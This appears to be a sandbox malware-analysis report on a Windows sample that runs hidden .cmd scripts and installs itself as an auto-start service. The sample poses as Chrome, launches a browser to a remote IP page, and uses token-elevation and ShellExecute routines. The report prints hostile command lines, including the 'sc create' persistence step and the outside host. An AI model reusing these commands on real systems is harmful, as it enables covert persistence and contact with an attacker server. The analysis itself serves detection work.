                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\Installer\MSIDD62.tmp
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
                                                                    Imagebase:0x3e0000
                                                                    File size:423'936 bytes
                                                                    MD5 hash:768B35409005592DE2333371C6253BC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
• Detection: 0%, Virustotal
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:13
                                                                    Start time:03:13:11
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\Installer\MSIDD92.tmp
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Installer\MSIDD92.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                                                                    Imagebase:0xd70000
                                                                    File size:423'936 bytes
                                                                    MD5 hash:768B35409005592DE2333371C6253BC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:14
                                                                    Start time:03:13:11
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 3%, ReversingLabs
                                                                    • Detection: 5%, Virustotal
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:15
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"
                                                                    Imagebase:0x7ff74af90000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:16
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:17
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\"
                                                                    Imagebase:0x7ff74af90000
                                                                    File size:289'792 bytes
                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:18
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:19
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
                                                                    Imagebase:0x7ff779e30000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:20
                                                                    Start time:03:13:12
                                                                    Start date:04/07/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:sc start MeuServico
                                                                    Imagebase:0x7ff779e30000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Target ID:22
                                                                    Start time:03:13:14
                                                                    Start date:04/07/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.php
                                                                    Imagebase:0x7ff6c4390000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:25
                                                                    Start time:03:13:14
                                                                    Start date:04/07/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 --field-trial-handle=2224,i,3053730682193171380,1241186122492042118,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x7ff6c4390000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:26
                                                                    Start time:03:13:20
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001A.00000002.2500173208.0000000000AD1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:27
                                                                    Start time:03:13:21
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001B.00000002.2499757267.0000000000931000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:28
                                                                    Start time:03:13:21
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom.
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001C.00000002.2499650796.00000000009A1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:29
                                                                    Start time:03:13:21
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001D.00000002.2500761297.0000000000951000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:30
                                                                    Start time:03:13:21
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000001E.00000002.2500873728.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                    Target ID:32
                                                                    Start time:04:32:11
                                                                    Start date:04/07/2024
                                                                    Path:C:\Users\user\Pictures\fotosdaviagem\windows10.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2
                                                                    Imagebase:0x400000
                                                                    File size:1'626'280 bytes
                                                                    MD5 hash:BDC0CFF1E6E3DB489864041A623F0D1E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000020.00000002.2509121919.0000000000A41000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                    Has exited:false

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:27.6%
                                                                      Total number of Nodes:344
                                                                      Total number of Limit Nodes:5
35403->35391 35405 3e7168 SysAllocString 35404->35405 35406 3e7102 SysAllocString 35404->35406 35405->35406 35407 3e751f _com_issue_error 35405->35407 35410 3e712f 35406->35410 35411 3e7138 SysAllocString 35406->35411 35512 3e1910 LocalFree RaiseException CallUnexpected 35407->35512 35410->35407 35410->35411 35413 3e717d VariantInit 35411->35413 35414 3e715d 35411->35414 35412 3e7533 35412->35258 35417 3e71fd 35413->35417 35414->35407 35414->35413 35415 3e7201 VariantClear VariantClear VariantClear VariantClear SysFreeString 35415->35403 35417->35415 35430 3e724b 35417->35430 35418 3e3b40 44 API calls 35418->35430 35422 3e751a 35511 40c5c2 41 API calls 2 library calls 35422->35511 35423 3e72ef LocalFree 35423->35430 35425 3e7344 OpenProcess WaitForSingleObject 35426 3e737a GetExitCodeProcess 35425->35426 35425->35430 35426->35430 35428 3e7394 CloseHandle 35428->35430 35429 3e73dd LocalFree 35429->35430 35430->35415 35430->35417 35430->35418 35430->35422 35430->35423 35430->35425 35430->35428 35430->35429 35507 3e40a0 50 API calls 3 library calls 35430->35507 35508 3e61d0 95 API calls 2 library calls 35430->35508 35509 3e3cc0 42 API calls collate 35430->35509 35510 3e6a60 10 API calls 35430->35510 35432 3e76d1 35431->35432 35513 3e2100 42 API calls 4 library calls 35432->35513 35434 3e76e9 35514 3e2100 42 API calls 4 library calls 35434->35514 35436 3e7700 35515 3e7db0 59 API calls 2 library calls 35436->35515 35438 3e7718 35439 3e7a7b 35438->35439 35440 3e7747 35438->35440 35516 3e2750 41 API calls 35438->35516 35524 3e1910 LocalFree RaiseException CallUnexpected 35439->35524 35517 410d39 43 API calls 35440->35517 35443 3e7a85 GetWindowThreadProcessId 35445 3e7aae GetWindowLongW 35443->35445 35446 3e7ae1 35443->35446 35445->35258 35446->35258 35447 3e7755 35447->35439 35448 3e7766 35447->35448 35518 3e2100 42 API calls 4 library calls 35448->35518 35450 3e784f 35451 3e78ad 35450->35451 35452 3e78a4 GetForegroundWindow 35450->35452 35453 3e78bd ShellExecuteExW 
35451->35453 35452->35451 35454 3e78ce 35453->35454 35455 3e78d7 35453->35455 35521 3e7c30 6 API calls 35454->35521 35458 3e7912 35455->35458 35460 3e78ed ShellExecuteExW 35455->35460 35456 3e7816 GetWindowsDirectoryW 35519 3e1980 70 API calls 35456->35519 35465 3e79c8 35458->35465 35466 3e7938 GetModuleHandleW GetProcAddress 35458->35466 35460->35458 35462 3e7909 35460->35462 35461 3e7837 35520 3e1980 70 API calls 35461->35520 35522 3e7c30 6 API calls 35462->35522 35468 3e79f2 35465->35468 35469 3e79dc WaitForSingleObject GetExitCodeProcess 35465->35469 35471 3e7952 AllowSetForegroundWindow 35466->35471 35467 3e777b 35467->35450 35467->35456 35523 3e7d30 CloseHandle 35468->35523 35469->35468 35471->35465 35472 3e7960 35471->35472 35472->35465 35473 3e7969 GetModuleHandleW GetProcAddress 35472->35473 35473->35465 35474 3e7984 35473->35474 35474->35465 35478 3e7995 Sleep EnumWindows 35474->35478 35475 3e79fe 35476 407708 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 35475->35476 35477 3e7a73 35476->35477 35477->35258 35478->35474 35479 3e79c1 BringWindowToTop 35478->35479 35479->35465 35481 3e2548 35480->35481 35492 3e259c 35480->35492 35501 407875 6 API calls 35481->35501 35484 3e2552 35486 3e255e GetProcessHeap 35484->35486 35484->35492 35485 3e25b6 35494 3e1ff0 35485->35494 35505 407b87 44 API calls 35485->35505 35502 407b87 44 API calls 35486->35502 35489 3e258b 35503 40782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35489->35503 35490 3e2616 35506 40782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35490->35506 35492->35494 35504 407875 6 API calls 35492->35504 35494->35368 35494->35372 35495->35374 35496->35378 35497->35379 35498->35382 35499->35382 35500->35371 35501->35484 35502->35489 35503->35492 35504->35485 35505->35490 35506->35494 35507->35430 35508->35430 35509->35430 35510->35430 35512->35412 35513->35434 35514->35436 35515->35438 35516->35440 
35517->35447 35518->35467 35519->35461 35520->35450 35521->35455 35522->35458 35523->35475 35524->35443

                                                                      Control-flow Graph (function 3e6ee0; the graphical edge list is reduced to the block sequence)

                                                                      • Entry 3e6ee0 calls 3e5f90 (token elevation check). One outcome branches to 3e6f33 and calls the ShellExecuteExW launcher 3e7660 directly; the other enters the COM path at 3e6f55.
                                                                      • COM path: CoInitialize, CoCreateInstance (3e6f55) -> VariantInit (3e6f98) -> IUnknown_QueryService (3e6ff1) -> IUnknown_QueryInterface_Proxy (3e7071, 3e70bf) -> CoAllowSetForegroundWindow (3e70e8) -> SysAllocString at 3e710a, 3e7138 and 3e7168 -> VariantInit (3e717d) -> loop starting at 3e7216: string helpers 3e3b40, 3e40a0, 3e61d0, 3e3cc0 (3e724b) -> LocalFree (3e72ef) -> optional call 3e6a60 (3e7334) -> OpenProcess, WaitForSingleObject (3e7344) -> GetExitCodeProcess (3e737a) -> CloseHandle (3e7394) -> LocalFree (3e73dd) -> 3e73fc either loops back to 3e7216 or leaves via 3e740b -> VariantClear x4, SysFreeString (3e740f) -> unwind blocks 3e7454..3e74cb (VariantClear) -> CoUninitialize (3e74f6) -> 3e74ff call 407708.
                                                                      • Failure paths: a failed SysAllocString reaches 3e751f (call 3f1cb0, i.e. _com_issue_error at 3e7524) and 3e7529 (call 3e1910, which raises); 3e72da and 3e73c8 reach 3e751a (call 40c5c2).
                                                                      APIs
                                                                        • Part of subcall function 003E5F90: GetCurrentProcess.KERNEL32(00000008,?,755CD0F6), ref: 003E5FA0
                                                                        • Part of subcall function 003E5F90: OpenProcessToken.ADVAPI32(00000000), ref: 003E5FA7
                                                                      • CoInitialize.OLE32(00000000), ref: 003E6F55
                                                                      • CoCreateInstance.OLE32(0042D310,00000000,00000004,0043B320,00000000,?), ref: 003E6F85
                                                                      • Decoded: rclsid at 0042D310, pUnkOuter NULL, dwClsContext 4 = CLSCTX_LOCAL_SERVER (out-of-process activation), riid at 0043B320; the GUIDs themselves are not resolved in this report. This is the branch taken when the 3e5f90 token check does not send execution straight to the ShellExecuteExW launcher at 3e7660: after QueryService/QueryInterface, CoAllowSetForegroundWindow and three SysAllocString calls, the routine ends in OpenProcess + WaitForSingleObject + GetExitCodeProcess on a process id obtained after the COM calls, so both branches finish by waiting on a launched child and collecting its exit code.
                                                                      • CoUninitialize.OLE32 ref: 003E74F6
                                                                      • _com_issue_error.COMSUPP ref: 003E7524
                                                                        • Part of subcall function 003E1910: LocalFree.KERNEL32(?,755CD0F6,?,00000000,004292C0,000000FF,?,?,00441348,00000000,003E16D0,80004005), ref: 003E195C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                      • String ID: $
                                                                      • API String ID: 2507920217-3993045852
                                                                      • Opcode ID: 1ca910e5451a69b3fd9ee6141759ebba37262f05ae27a4974fb756373095a4dd
                                                                      • Instruction ID: 90f749c0f5d49fde13ac7e63401a1ae796e358e00c2f18b5ae1d310daeb29110
                                                                      • Opcode Fuzzy Hash: 1ca910e5451a69b3fd9ee6141759ebba37262f05ae27a4974fb756373095a4dd
                                                                      • Instruction Fuzzy Hash: 4522C170E04398DFEB12CFA9C948B9DBBB8AF45304F248299E405EB2C1D7759E45CB51

                                                                      Control-flow Graph

                                                                      Block sequence for 3e5f90 (graph residue reduced): GetCurrentProcess, OpenProcessToken (3e5f90) -> on failure 3e5fb1 returns without a token; on success 3e5fb7 GetTokenInformation -> 3e5fee CloseHandle on the token (the 3e5fe6 failure block also falls through to CloseHandle) -> return at 3e5ffe.
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000008,?,755CD0F6), ref: 003E5FA0
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 003E5FA7
                                                                      • GetTokenInformation.KERNELBASE(?,00000014(TokenElevation),?,00000004,?), ref: 003E5FDC
                                                                      • Note: the report labels this class TokenIntegrityLevel, but TOKEN_INFORMATION_CLASS 0x14 (20) is TokenElevation (TokenIntegrityLevel is 0x19), and the 4-byte buffer matches TOKEN_ELEVATION.TokenIsElevated. 3e5f90 is therefore an "is this process elevated?" check, and its result is what selects between the COM path and the ShellExecuteExW launcher 3e7660 in 3e6ee0.
                                                                      • CloseHandle.KERNEL32(?), ref: 003E5FF2
                                                                      Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as for the first function above (0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp at offset 003E0000; hcaresult_12_2_3e0000_MSIDD62.jbxd).
                                                                      Similarity
                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                      • String ID:
                                                                      • API String ID: 215268677-0
                                                                      • Opcode ID: 459562e0bfaae24554e102f00dbc3ad4b848c2d3a5328d0cecc6feaa7066fdbf
                                                                      • Instruction ID: ff9c0fdcc5f929f3c862eeb6bd21f8d4213874f841809cfade97b52b0aaa2474
                                                                      • Opcode Fuzzy Hash: 459562e0bfaae24554e102f00dbc3ad4b848c2d3a5328d0cecc6feaa7066fdbf
                                                                      • Instruction Fuzzy Hash: 43F01274544301EBE7119F10EC49B9AB7E8BB44708F908829F984C21A0D779D51EDA67

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32(755CD0F6,?,0000FFFF), ref: 003F1A4D
                                                                        • Part of subcall function 003E4EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 003E4EDD
                                                                      • ExitProcess.KERNEL32 ref: 003F1C27
                                                                        • Part of subcall function 003E8790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003E880D
                                                                      • Decoded: dwDesiredAccess 0x40000000 = GENERIC_WRITE, dwShareMode 0, dwCreationDisposition 2 = CREATE_ALWAYS, dwFlagsAndAttributes 0x80 = FILE_ATTRIBUTE_NORMAL. The file is created or truncated for writing, consistent with this routine logging the "Full command line:" text it obtains from GetCommandLineW before it calls ExitProcess.
                                                                      Strings
                                                                      Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as for the first function above (0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp at offset 003E0000; hcaresult_12_2_3e0000_MSIDD62.jbxd).
                                                                      Similarity
                                                                      • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                      • String ID: Full command line:
                                                                      • API String ID: 1878577176-831861440
                                                                      • Opcode ID: 7373685995bdf3526a8110768491acc9497e5d2aec67cf15c01cfde10f54ff6e
                                                                      • Instruction ID: 3b738205682251a7bd6febc178f60ecd348cc687d5fd1bfaec418155ff0ecef4
                                                                      • Opcode Fuzzy Hash: 7373685995bdf3526a8110768491acc9497e5d2aec67cf15c01cfde10f54ff6e
                                                                      • Instruction Fuzzy Hash: 2E517F30D10168DACB16EB21DC59BEEB775AF54300F1442D9E1096B2E2EF741F49CB91

                                                                      Control-flow Graph

                                                                      Block sequence for 3e7fd0 (graph residue reduced): 3e7fd0 GetTokenInformation with an empty buffer -> success exits at 3e80b0; failure -> 3e804e GetLastError -> 3e8059 -> either 3e8069 -> 3e809b, or 3e806e -> 3e8070 where a buffer is obtained via 3e8260 (3e8079) or 408e90 (3e8087) -> second GetTokenInformation at 3e809e -> 3e80b0 return.
                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenUser),00000000,00000000,003E7FA8,755CD0F6), ref: 003E8044
                                                                      • GetLastError.KERNEL32(?,TokenUser,00000000,00000000,003E7FA8,755CD0F6), ref: 003E804E
                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenUser),?,00000000,00000000,?,TokenUser,00000000,00000000,003E7FA8,755CD0F6), ref: 003E80AA
                                                                      • Note: class 0x01 is TokenUser, not TokenIntegrityLevel (0x19) as the report prints. The sequence is the standard two-call idiom for variable-length token data: the first call passes a NULL buffer and length 0 and fails, GetLastError is read (expected ERROR_INSUFFICIENT_BUFFER), a buffer is allocated in 3e8079/3e8087, and the call at 3e80aa repeats with it.
                                                                      Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as for the first function above (0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp at offset 003E0000; hcaresult_12_2_3e0000_MSIDD62.jbxd).
                                                                      Similarity
                                                                      • API ID: InformationToken$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2567405617-0
                                                                      • Opcode ID: 91634f2ab5937240ebd8d182368032f2a8552ef444b38714d1a71676ea67ecef
                                                                      • Instruction ID: 9cb2b3818910e1096dd25f3726c509b439633566ee1132ee1ba961dc10dcf393
                                                                      • Opcode Fuzzy Hash: 91634f2ab5937240ebd8d182368032f2a8552ef444b38714d1a71676ea67ecef
                                                                      • Instruction Fuzzy Hash: 2231AE71A00615AFD720CF59CC45BAFFBF9FB44714F10462EE515A7280DBB5AD048BA4

                                                                      Control-flow Graph

                                                                      Block sequence for 41c72b (CRT heap allocation wrapper; graph residue reduced): 41c72b -> size handling at 41c738/41c744 -> RtlAllocateHeap (41c763); a NULL result goes to 41c74f (call 41a8b7) and 41c758 (call 4215f6), which either retries the allocation or falls into the failure block 41c778 (call 40c6b0); both paths return through 41c785.
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,?,?,0041AFDA,00000001,00000364,?,00000006,000000FF,?,0040C282,?,?,?), ref: 0041C76C
                                                                      Memory Dump Source / Joe Sandbox IDA Plugin: same dump and snapshot as for the first function above (0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp at offset 003E0000; hcaresult_12_2_3e0000_MSIDD62.jbxd).
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 8baf37d041a291f986a3990f69517c5853c969abb358ce684c0b8fe845d2d49b
                                                                      • Instruction ID: bf2da7af2177b1f096a195f17616217efaa97c11f95fbf3983e03115826c5f0a
                                                                      • Opcode Fuzzy Hash: 8baf37d041a291f986a3990f69517c5853c969abb358ce684c0b8fe845d2d49b
                                                                      • Instruction Fuzzy Hash: B6F0BB316C122667EB212B26DCC9ADB37889B52771B144127A824A62D0CBA8D88189DD

                                                                      Control-flow Graph

                                                                      Block sequence for 3e7660 (graph residue reduced; edge list omitted):
                                                                      • 3e7660 -> 3e76cc: calls 3e8530, 3e2100 x2 and 3e7db0 (set-up), then either 3e772e (normal path) or 3e7a7b, which calls 3e1910 (raise) and is followed by the EnumWindows callback 3e7a90: GetWindowThreadProcessId, GetWindowLongW.
                                                                      • 3e772e -> 3e773f (call 3e2750) / 3e774a (call 410d39) -> 3e7766 (call 3e2100) -> 3e77aa..3e780f: a loop over the target string (presumably where the .bat/.cmd extension strings are compared) -> 3e7816 GetWindowsDirectoryW + 3e1980 x2, which build the %s\System32\cmd.exe path and the /C ""%s" %s" parameter.
                                                                      • 3e7855 -> conditional 3e78a4 GetForegroundWindow -> 3e78ad -> conditional 3e78b1 (call 3e7af0) -> 3e78bd ShellExecuteExW; on failure 3e78ce (call 3e7c30); 3e78dc -> 3e78e0 -> second ShellExecuteExW at 3e78ed (the strings give the verbs open and runas; which is tried first is not visible here), on failure 3e7909 (call 3e7c30).
                                                                      • 3e7912 (call 3e7ef0) -> 3e7938 GetModuleHandleW/GetProcAddress, AllowSetForegroundWindow -> 3e7969 GetModuleHandleW/GetProcAddress -> 3e7984/3e7990 loop: Sleep(100 ms), EnumWindows(3e7a90) until 3e79c1 BringWindowToTop.
                                                                      • 3e79cb -> 3e79d2 -> 3e79dc WaitForSingleObject, GetExitCodeProcess -> 3e79f2 (call 3e7d30, CloseHandle) -> 3e7a14..3e7a4e clean-up -> 3e7a56 (call 407708) return.
                                                                      APIs
                                                                      • GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,?), ref: 003E781F
                                                                      • GetForegroundWindow.USER32(?,?), ref: 003E78A4
                                                                      • ShellExecuteExW.SHELL32(?), ref: 003E78C1
                                                                      • ShellExecuteExW.SHELL32(?), ref: 003E78FF
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 003E7942
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003E7949
                                                                      • AllowSetForegroundWindow.USER32(00000000), ref: 003E7953
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?), ref: 003E7973
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003E797A
                                                                      • Sleep.KERNEL32(00000064,?,?,?), ref: 003E7997
